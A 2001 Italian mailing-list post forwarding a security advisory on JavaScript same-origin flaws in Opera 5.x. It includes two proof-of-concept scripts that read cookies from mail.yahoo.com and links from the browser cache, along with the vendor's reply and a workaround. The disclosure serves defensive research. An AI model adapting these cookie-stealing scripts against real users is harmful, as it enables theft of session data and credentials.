Fwd: Several javascript vulnerabilities in Opera

Giovanni Coppa giannicoppa@yahoo.it
Fri, 16 Nov 2001 09:11:22 +0100 (CET)


Non volgio dire niente ma normalmente questo tipo ha
sempre ragione chia va voglia di provarlo?!?! :-))


--- Georgi Guninski <guninski@guninski.com> ha
scritto: 
> 
> Georgi Guninski security advisory #51, 2001
> 
> Several javascript vulnerabilities in Opera
> 
> Systems affected:
> Opera 5.12/Windows, Opera 5.0/Linux - probably other
> versions
> 
> Risk: Medium
> Date: 15 November 2001
> 
> Legal Notice:
> This Advisory is Copyright (c) 2001 Georgi Guninski.
> You may distribute it unmodified.
> You may not modify it and distribute it or
> distribute parts
> of it without the author's written permission.
> 
> Disclaimer:
> The information in this advisory is believed to be
> true based on
> experiments though it may be false.
> The opinions expressed in this advisory and program
> are my own and
> not of any company. The usual standard disclaimer
> applies,
> especially the fact that Georgi Guninski is not
> liable for any damages
> caused by direct or  indirect use of the information
> or functionality
> provided by this advisory or program. Georgi
> Guninski bears no
> responsibility for content or misuse of this
> advisory or program or
> any derivatives thereof.
> 
> Anouncement:
> I am looking for contracts in the security area -
> check http://www.guninski.com
> 
> Description:
> Opera is a multiplatform web browser.
> There are several javascript vulnerabilities in it,
> basically allowing
> script in a page to access a page and its properties
> in another domain -
> AFAIK Netscape call this "Same Origin
> Vulnerability". 
> It is possible a script in web page to access at
> least cookies and links
> in arbitrary domains to which the user has access.
> It is also possible a script to read the the links
> in the user's cache and 
> history which at least have privacy implications if
> not more.
> In some cases cookies and links in the cahe/history
> may containg sensitive information
> such as usernames/passwords etc.
> 
> 
> Details:
> Examine the following scripts:
> -1.----------------------------------
> a=window.open("http://mail.yahoo.com");
> function f()
> {
> xx=a.document.cookie;
> alert("hi"+xx);
> a.document.open();
>
a.document.write("<h1>aa</h1><script>x=window.open('http://mail.yahoo.com');setTimeout('z=x.document.cookie;alert(z);',5000)</"+"script>");
> a.document.close();
> }
> setTimeout("f()",5000);
> -----------------------------------
> 
> -2.--------------------------------
> a=window.open("about:cache");
> function f()
> {
> xx=a.document.links[2];
> alert("hi="+xx);
> }
> setTimeout("f()",5000);
> -----------------------------------
> 
> In addiotion the HotJava explot at
> http://www.guninski.com/hotjava1-desc.html works as
> Jay@InfoAve.net pointed out.
> 
> Workaround:
> Disable javascript (Opera suggest enabling "Use
> cookies to trace password protected documents")
> 
> Vendor status:
> The vendor was notified on 5 November 2001 and was
> asked whether a fix shall be issued and when.
> The reply was:
> ------------------------------------
> You should be able to resolve the cookie issue by
> enabling "Use cookies to trace password protected
> documents", 
> which means that pages with password protection
> aren't cached, cookies aren't stored, 
> the URL shouldn't be displayed in History, etc. 
> This is a "paranoia" option, and makes a few pages
> unusable.
> As you are probably aware, many web technologies
> aren't very secure, 
> but it is inconvenient for the user to block these. 
> This is why the user should be given a choice to
> block privacy related information.
> ------------------------------------
> 
> Regards,
> Georgi Guninski
> http://www.guninski.com
> ----------------------
> You may visit Guninski Security Mailing List page at
> http://www.guninski.com/mailinglist.html
> ---------------------- 

______________________________________________________________________

Abbonati a Yahoo! ADSL con Atlanet!
Naviga su Internet ad alta velocitą, e senza limiti di tempo! 
Per saperne di pił vai alla pagina http://adsl.yahoo.it